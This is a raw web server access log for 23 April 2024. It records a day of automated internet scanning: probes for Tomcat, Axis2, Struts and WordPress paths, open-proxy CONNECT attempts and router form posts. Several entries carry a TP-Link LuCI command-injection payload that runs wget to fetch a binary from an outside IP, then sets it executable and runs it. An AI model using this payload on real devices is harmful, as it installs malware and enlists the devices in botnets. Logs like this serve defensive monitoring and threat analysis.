194.169.175.40 - - [23/Apr/2024:00:07:32 +0200] "-" 400 1930 165.154.120.253 - - [23/Apr/2024:00:09:33 +0200] "GET / HTTP/1.1" 200 1895 165.154.120.253 - - [23/Apr/2024:00:09:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.120.253 - - [23/Apr/2024:00:09:34 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 165.154.120.253 - - [23/Apr/2024:00:09:34 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.120.253 - - [23/Apr/2024:00:09:36 +0200] "GET /axis2-admin/ HTTP/1.1" 404 734 165.154.120.253 - - [23/Apr/2024:00:09:36 +0200] "GET /axis2/ HTTP/1.1" 404 728 165.154.120.253 - - [23/Apr/2024:00:09:37 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 744 165.154.120.253 - - [23/Apr/2024:00:09:38 +0200] "GET null HTTP/1.1" 400 1994 165.154.120.253 - - [23/Apr/2024:00:09:38 +0200] "GET /struts/webconsole.html HTTP/1.1" 404 744 165.154.120.253 - - [23/Apr/2024:00:09:39 +0200] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 165.154.120.253 - - [23/Apr/2024:00:09:40 +0200] "GET /invoker/readonly HTTP/1.1" 404 738 194.169.175.48 - - [23/Apr/2024:00:39:44 +0200] "-" 400 1930 179.43.190.218 - - [23/Apr/2024:00:41:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.36.81.40 - - [23/Apr/2024:00:52:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.71.226 - - [23/Apr/2024:01:05:10 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 87.121.69.52 - - [23/Apr/2024:01:14:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 192.227.146.232 - - [23/Apr/2024:01:30:37 +0200] "GET /manager/html HTTP/1.1" 401 2499 91.92.245.67 - - [23/Apr/2024:01:50:56 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [23/Apr/2024:01:50:56 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.142.182.70 - - [23/Apr/2024:01:56:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [23/Apr/2024:02:23:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 195.140.227.163 - - [23/Apr/2024:02:31:55 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [23/Apr/2024:02:31:55 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 172.104.242.173 - - [23/Apr/2024:02:51:03 +0200] "-" 400 1930 185.180.143.71 - - [23/Apr/2024:03:25:34 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.152 - - [23/Apr/2024:03:26:06 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [23/Apr/2024:03:26:06 +0200] "-" 400 1930 45.128.232.152 - - [23/Apr/2024:03:26:06 +0200] "-" 400 1930 45.128.232.152 - - [23/Apr/2024:03:26:06 +0200] "-" 400 1930 205.210.31.83 - - [23/Apr/2024:03:56:03 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:04:04:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:04:04:31 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:04:04:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.177.106.60 - - [23/Apr/2024:04:17:59 +0200] "GET /manager/html HTTP/1.1" 401 2499 87.121.69.25 - - [23/Apr/2024:04:38:04 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 45.142.182.70 - - [23/Apr/2024:05:03:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 94.156.66.81 - - [23/Apr/2024:05:11:38 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 179.43.190.218 - - [23/Apr/2024:06:41:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [23/Apr/2024:06:44:41 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 185.191.126.213 - - [23/Apr/2024:06:47:05 +0200] "GET / HTTP/1.1" 200 1895 220.92.139.211 - - [23/Apr/2024:06:50:37 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.52 - - [23/Apr/2024:07:05:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [23/Apr/2024:07:52:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:07:52:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:07:52:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729 146.148.113.189 - - [23/Apr/2024:08:27:12 +0200] "GET / HTTP/1.1" 200 1895 195.140.227.163 - - [23/Apr/2024:08:31:55 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [23/Apr/2024:08:31:55 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 87.121.69.25 - - [23/Apr/2024:08:44:53 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 64.62.197.151 - - [23/Apr/2024:09:46:59 +0200] "-" 400 1930 58.220.109.154 - - [23/Apr/2024:09:59:36 +0200] "GET / HTTP/1.1" 200 1895 152.32.183.209 - - [23/Apr/2024:10:21:25 +0200] "-" 400 1930 152.32.183.209 - - [23/Apr/2024:10:21:36 +0200] "GET / HTTP/1.1" 200 1895 152.32.183.209 - - [23/Apr/2024:10:21:55 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.183.209 - - [23/Apr/2024:10:21:55 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.183.209 - - [23/Apr/2024:10:21:55 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 87.18.63.28 - - [23/Apr/2024:10:26:15 +0200] "GET / HTTP/1.0" 200 1895 179.43.180.108 - - [23/Apr/2024:10:44:01 +0200] "CONNECT ifconfig.me:443 HTTP/1.1" 400 804 87.121.69.25 - - [23/Apr/2024:10:46:51 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 146.19.24.28 - - [23/Apr/2024:10:47:16 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.151 - - [23/Apr/2024:11:02:10 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.139 - - [23/Apr/2024:11:02:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.148 - - [23/Apr/2024:11:02:45 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.150 - - [23/Apr/2024:11:02:51 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 179.43.190.218 - - [23/Apr/2024:11:56:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 80.94.92.60 - - [23/Apr/2024:11:59:01 +0200] "GET / HTTP/1.1" 200 1895 183.14.89.174 - - [23/Apr/2024:13:00:49 +0200] "GET /manager/html HTTP/1.1" 401 2499 80.251.149.178 - - [23/Apr/2024:13:01:08 +0200] "GET / HTTP/1.1" 200 1895 162.243.146.4 - - [23/Apr/2024:13:03:35 +0200] "GET / HTTP/1.1" 200 1895 91.92.245.67 - - [23/Apr/2024:13:09:05 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [23/Apr/2024:13:15:08 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 206.168.32.3 - - [23/Apr/2024:13:20:23 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:13:20:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:13:20:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.52 - - [23/Apr/2024:13:33:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.156.129.46 - - [23/Apr/2024:14:03:25 +0200] "GET / HTTP/1.1" 200 1895 45.156.129.46 - - [23/Apr/2024:14:03:26 +0200] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 404 772 180.149.125.159 - - [23/Apr/2024:14:07:23 +0200] "GET / HTTP/1.1" 200 1895 111.194.14.122 - - [23/Apr/2024:14:16:24 +0200] "GET / HTTP/1.1" 200 1895 195.140.227.163 - - [23/Apr/2024:14:31:55 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [23/Apr/2024:14:31:55 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 205.210.31.39 - - [23/Apr/2024:14:34:04 +0200] "-" 400 1930 205.210.31.39 - - [23/Apr/2024:14:34:05 +0200] "-" 400 1930 27.147.222.15 - - [23/Apr/2024:14:40:34 +0200] "GET / HTTP/1.1" 200 1895 80.94.92.60 - - [23/Apr/2024:14:49:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [23/Apr/2024:14:52:07 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 192.241.238.7 - - [23/Apr/2024:14:58:41 +0200] "-" 400 1930 94.156.71.233 - - [23/Apr/2024:15:01:27 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 91.92.245.67 - - [23/Apr/2024:15:32:27 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 212.102.57.165 - - [23/Apr/2024:15:36:46 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804 87.121.69.25 - - [23/Apr/2024:16:00:21 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 91.191.209.206 - - [23/Apr/2024:16:08:52 +0200] "-" 400 1930 212.102.57.165 - - [23/Apr/2024:16:12:35 +0200] "CONNECT www.mathematik.hu-berlin.de:443 HTTP/1.1" 400 804 179.43.190.218 - - [23/Apr/2024:16:39:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.161.248.148 - - [23/Apr/2024:16:43:56 +0200] "-" 400 1930 125.45.11.148 - - [23/Apr/2024:17:07:38 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 125.45.11.148 - - [23/Apr/2024:17:07:38 +0200] "-" 400 1930 78.108.177.50 - - [23/Apr/2024:17:49:06 +0200] "GET / HTTP/1.0" 200 1895 91.191.209.206 - - [23/Apr/2024:17:54:02 +0200] "-" 400 1930 146.19.24.28 - - [23/Apr/2024:17:59:30 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [23/Apr/2024:18:14:52 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 45.142.182.70 - - [23/Apr/2024:18:24:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 179.43.190.218 - - [23/Apr/2024:18:39:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.52 - - [23/Apr/2024:19:11:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 186.33.84.226 - - [23/Apr/2024:20:27:36 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [23/Apr/2024:21:24:07 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.75 - - [23/Apr/2024:21:28:52 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.83.66.136 - - [23/Apr/2024:21:35:32 +0200] "GET / HTTP/1.1" 200 1895 45.83.65.255 - - [23/Apr/2024:21:35:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.216.71.4 - - [23/Apr/2024:22:12:28 +0200] "GET /json/?fields=61439 HTTP/1.1" 404 727 185.216.71.4 - - [23/Apr/2024:22:12:28 +0200] "-" 400 1930 84.54.51.13 - - [23/Apr/2024:22:31:29 +0200] "POST /login HTTP/1.1" 404 723 206.168.32.3 - - [23/Apr/2024:22:38:45 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:22:38:48 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [23/Apr/2024:22:38:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729 104.248.234.176 - - [23/Apr/2024:22:42:12 +0200] "GET / HTTP/1.1" 200 1895 121.166.136.150 - - [23/Apr/2024:23:10:46 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 205.210.31.210 - - [23/Apr/2024:23:36:42 +0200] "-" 400 1930 205.210.31.210 - - [23/Apr/2024:23:36:42 +0200] "-" 400 1930 179.43.190.218 - - [23/Apr/2024:23:57:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756